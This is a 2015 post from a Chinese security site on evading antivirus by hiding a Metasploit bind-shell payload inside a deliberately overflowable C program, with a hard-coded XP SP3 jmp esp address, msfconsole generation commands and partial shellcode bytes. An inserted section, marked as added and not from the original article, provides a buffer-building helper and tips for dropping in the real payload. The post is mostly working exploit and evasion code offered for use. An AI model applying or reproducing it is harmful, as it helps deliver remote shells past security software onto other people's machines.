Bypassing antivirus protection with an overflow vulnerability - vulnerability warning - Heiba Security Net (黑吧安全网)

2015-09-04T00:00:00
ID MYHACK58:62201566557
Type myhack58
Reporter Anonymous (佚名)
Modified 2015-09-04T00:00:00

Description

Ideas

Write a program that deliberately contains a stack overflow and carry the malicious code only as shellcode inside the overflowing input. On disk the binary looks like an ordinary program with an embedded data string; at run time the overflow redirects execution into that string, so the shellcode runs and the antivirus protection is bypassed.

Test environment

Platform: Windows XP SP3

Compiler: VC 6.0

Test code

Construct the following exploit code, which loads the shellcode:

#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: a 4-byte buffer filled by strcpy with no bounds check */
void overflow(char *input)
{
    char buf[4];
    strcpy(buf, input);
}

int main(void)
{
    /* Stack layout on x86 with VC 6.0 (no stack cookie): 4 bytes of buf,
       4 bytes of saved EBP, then the return address; after the RET, ESP
       points at the bytes that follow the return address. */
    char shellcode[] = "AAAAAAAA"           /* fills buf[4] and the saved EBP */
                       "\x7b\x46\x86\x7c"   /* return address: jmp esp (XP SP3 test machine) */
                       "\x90\x90\x90\x90"   /* NOP sled; ESP lands here after RET */
                       "\x90\x90\x90\x90"
                       "\x90\x90\x90\x90"
                       "\x90\x90\x90\x90"
                       "\x90\x90\x90\x90"
                       "shellcode"          /* placeholder: paste the generated buf[] bytes here */
                       "\x90\x90\x90\x90"
                       "\x90\x90\x90\x90"
                       "\x90\x90\x90\x90"
                       "\x90\x90\x90\x90"
                       "\x90\x90\x90\x90";
    overflow(shellcode);
    return 0;
}
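Hand-counting the bytes in that string literal is error-prone, and the delivery mechanism has one hard constraint the article only hints at with `-b '\x00'`: strcpy() stops at the first NUL, so any 0x00 inside the shellcode truncates the payload on the stack. The following added example (written for this page, not code from the original article) assembles the same layout programmatically and refuses shellcode that contains a NUL. The function names build_exploit and first_nul, the 20-byte NOP sled and the sample shellcode bytes are assumptions of this example; the 0x7C86467B jmp esp address and the 4-byte buffer come from the article's XP SP3 / VC 6.0 setup. It is plain host C and runs anywhere; it only builds and inspects the buffer, it does not execute anything.

```c
/* Added example, not part of the original article: build the overflow
   buffer [padding][ret = jmp esp][NOP sled][shellcode] from its parts and
   check the property strcpy() delivery depends on (no embedded NUL). */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE      4             /* char buf[4] in overflow()              */
#define SAVED_EBP     4             /* saved frame pointer, x86, no /GS       */
#define RET_OFFSET    (BUF_SIZE + SAVED_EBP)  /* 8: where the return address lands */
#define JMP_ESP_ADDR  0x7C86467BUL  /* jmp esp address used by the article (XP SP3) */
#define NOP_SLED      20            /* assumption: matches the 5 NOP lines above */
#define MAX_PAYLOAD   1024

/* Return the index of the first 0x00 in the shellcode, or -1 if none.
   strcpy() stops copying at that byte, so everything after it never
   reaches the stack; this is why the article generates with -b '\x00'. */
int first_nul(const unsigned char *sc, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (sc[i] == 0x00)
            return (int)i;
    return -1;
}

/* Build the buffer into out. Returns the payload length (without the
   terminating NUL) or -1 if it does not fit or the shellcode has a NUL. */
int build_exploit(unsigned char *out, size_t out_cap,
                  const unsigned char *sc, size_t sc_len)
{
    size_t need = RET_OFFSET + 4 + NOP_SLED + sc_len + 1;
    size_t p = 0;

    if (need > out_cap || first_nul(sc, sc_len) != -1)
        return -1;

    memset(out + p, 'A', RET_OFFSET);            /* buf[4] + saved EBP */
    p += RET_OFFSET;
    /* return address, little-endian: the same bytes as "\x7b\x46\x86\x7c" */
    out[p++] = (unsigned char)(JMP_ESP_ADDR & 0xff);
    out[p++] = (unsigned char)((JMP_ESP_ADDR >> 8) & 0xff);
    out[p++] = (unsigned char)((JMP_ESP_ADDR >> 16) & 0xff);
    out[p++] = (unsigned char)((JMP_ESP_ADDR >> 24) & 0xff);
    memset(out + p, 0x90, NOP_SLED);             /* ESP lands in the sled after RET */
    p += NOP_SLED;
    memcpy(out + p, sc, sc_len);                 /* the encoded payload */
    p += sc_len;
    out[p] = '\0';                               /* strcpy() needs a terminator */
    return (int)p;
}

int main(void)
{
    /* constructed stand-in for the msf output: INT3 ; RET, no NUL bytes */
    static const unsigned char sc_ok[]  = { 0xcc, 0xc3 };
    /* constructed shellcode with an embedded NUL: would be truncated by strcpy */
    static const unsigned char sc_bad[] = { 0xcc, 0x00, 0xc3 };
    unsigned char buf[MAX_PAYLOAD];
    int n;

    n = build_exploit(buf, sizeof buf, sc_ok, sizeof sc_ok);
    printf("clean payload: %d bytes, return address at offset %d = %02x %02x %02x %02x\n",
           n, RET_OFFSET, buf[8], buf[9], buf[10], buf[11]);

    n = build_exploit(buf, sizeof buf, sc_bad, sizeof sc_bad);
    printf("payload with NUL at index %d: build_exploit returned %d\n",
           first_nul(sc_bad, sizeof sc_bad), n);
    return 0;
}
```

To reuse it with the real payload, replace sc_ok with the buf[] array that msf generates and emit the result as a C string literal or write it to a file; the NUL check is the part worth keeping, since a single bad byte silently shortens the copy and the program simply crashes instead of returning a shell.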

First, generate a payload with msfpayload on its own and scan it: most antivirus engines flag it as malicious.


Then generate the shellcode and paste it into the source in place of the "shellcode" placeholder:

msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > generate -b '\x00' -t c
/*
 * windows/shell/bind_tcp - 312 bytes (stage 1)
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * VERBOSE=false, LPORT=4444, RHOST=,
 * PayloadUUIDTracking=false, EnableStageEncoding=false,
 * StageEncoderSaveRegisters=, StageEncodingFallback=true,
 * PrependMigrate=false, EXITFUNC=none, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] =
"\xbd\x81\xf6\x2c\x43\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x48\x83\xc0\x04\x31\x68\x0f\x03\x68\x8e\x14\xd9\xbf\x78\x5a"
"\x22\x40\x78\x3b\xaa\xa5\x49\x7b\xc8\xae\xf9\x4b\x9a\xe3\xf5"
"\x20\xce\x17\x8e\x45\xc7\x18\x27\xe3\x31\x16\xb8\x58\x01\x39"

······

After compiling, the resulting binary passes most antivirus engines:


The bind shell comes back successfully; tested with 360 antivirus running:


Other

@Sweets said that a master had already proposed this idea back in '02, but I don't know why it still works; my guess is that antivirus software is still biased toward static checks?

Attached: related material from Xcon 2002, "Overflow-implanted Trojan (backdoor): a prototype implementation".